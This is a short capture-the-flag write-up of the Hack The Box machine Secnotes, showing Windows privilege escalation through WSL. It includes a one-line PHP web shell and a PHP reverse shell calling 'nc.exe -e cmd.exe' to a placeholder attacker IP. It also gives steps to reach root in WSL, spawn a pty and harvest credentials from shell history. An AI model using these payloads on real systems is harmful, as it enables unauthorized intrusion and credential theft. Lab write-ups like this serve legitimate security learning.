Windows Privilege Escalataion-WSL
WSL is abbrevation of Windows Subsytem for Linux may give us opportunity of escalating privilege on Windows.
Here is one of the examples in HTB. The machine is Secnotes.
After finding simple SQL injection and get smb credentials of a user, we connect to the attacker via SmbClient.
When we go to the sharings, we have found that there is a sharing to enable us to put some files. I tried to put simple text file.
When I look for the url with port number 8808;
http://10.10.10.97:8808/test.txt
I get the contents of the file.
I am trying to put php webshell.
<?php
system($_GET[’cmd’]);
?>I have uploaded this file as test.php. And got to url part.
http://IPADDRESS/shell.php?cmd=whoami
Bingooo!
I have run a php code. Then I am trying to upload a reverse shell.
- locate nc.exe.
- cp <nc.exe with FULL PATH> nc.exe
- Go to smb cli. put nc.exe
<?php
system(’nc.exe -e cmd.exe ATTACKER_IP PORT’)
?>4. Create above script. name shell.php and go to url.
http://10.10.10.97:8808/shell.php
We get the shell.
Lets go to wsl part.
where /R C:\Windows wsl.exe
wsl.exe whoami
yess we can start with root privileges.
with, bash.exe
lets get pty shell:
python -c 'import pty; pty.spawn("/bin/sh")'with history command, we get credentials. After getting smb credentials we can use psexec.
